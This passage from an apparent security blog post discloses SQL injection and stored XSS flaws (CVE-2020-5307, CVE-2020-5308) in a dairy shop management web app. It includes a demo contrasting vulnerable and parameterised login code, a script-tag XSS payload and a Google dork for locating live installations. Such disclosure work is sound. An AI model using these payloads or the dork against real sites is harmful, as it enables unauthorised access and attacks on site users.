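        "vulnerable_wrong_password": login_vulnerable(conn, "admin", "wrong"),
        "safe_with_payload": login_safe(conn, PAYLOAD, "a"),
        "safe_legit": login_safe(conn, "admin", "Str0ngPassw0rd!"),
    }


if __name__ == "__main__":
    print(rendered_query(PAYLOAD, "a"))
    for case, result in demo().items():
        print(f"{case:28} -> {result!r}")
```

<p>The vulnerable function returns <code class="language-plaintext highlighter-rouge">'admin'</code> for the payload with a wrong password; the parameterised one returns <code class="language-plaintext highlighter-rouge">None</code>, because the whole payload is compared against the username column as a literal string. Printing <code class="language-plaintext highlighter-rouge">rendered_query()</code> shows the comment swallowing the password clause.</p>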
<p>As it turns out, this web application is vulnerable to a herd-full of SQL injections. Once authenticated I discovered 10 more that I will not document here out of a desire for brevity. Submission of these multiple SQL injections to MITRE earned me <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5307">CVE-2020-5307</a>.</p>
<h2 id="cve-2020-5308">CVE-2020-5308</h2>
<p>After briefly exploring the internals of the web application and learning its functionality, I began to test for the presence of cross-site scripting. I expected to find quite a few as I knew from the SQL injection that user inputs were not being sufficiently sanitized.</p>
<p>Part of the web app allows the user to create custom product categories. Let’s create a category named <code class="language-plaintext highlighter-rouge"><script>alert('moo')</script></code> and see what happens when we change pages to view all categories.</p>
<p><img src="/assets/images/Exploit-Dev/DFSMS/6.png" alt="" /><br />
<em>Figure 6: Potential XSS Payload</em></p>
<p>Once a user navigates to the manage categories page…</p>
<p><img src="/assets/images/Exploit-Dev/DFSMS/7.png" alt="" /><br />
<em>Figure 7: Successful Stored XSS</em></p>
<p>Elsewhere in this web application I discovered 3 more stored cross-site scripting vulnerabilities. Submission of these multiple stored XSS vulnerabilities resulted in <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5308">CVE-2020-5308</a>.</p>
<h2 id="impact">Impact</h2>
<p>The impact of these vulnerabilities is fairly minimal because the application is not widely used. It was released on December 29th, 2019 and currently has fewer than 500 downloads. A quick Google dork reveals only one website that was running this web application, and that page now returns a 403 error.</p>
<p>Google Dork: <code class="language-plaintext highlighter-rouge">Dairy Farm Shop Management System intitle:"Login Page"</code></p>
<p><img src="/assets/images/Exploit-Dev/DFSMS/8.png" alt="" /><br />
<em>Figure 8: Results of Google Dork</em></p>
<p>In conclusion, if you own a small dairy farm shop, I would recommend emailing the authors of Dairy Farm Management System, as I have done, to get their platform improved.</p>
<p>Author: cinzinga.</p>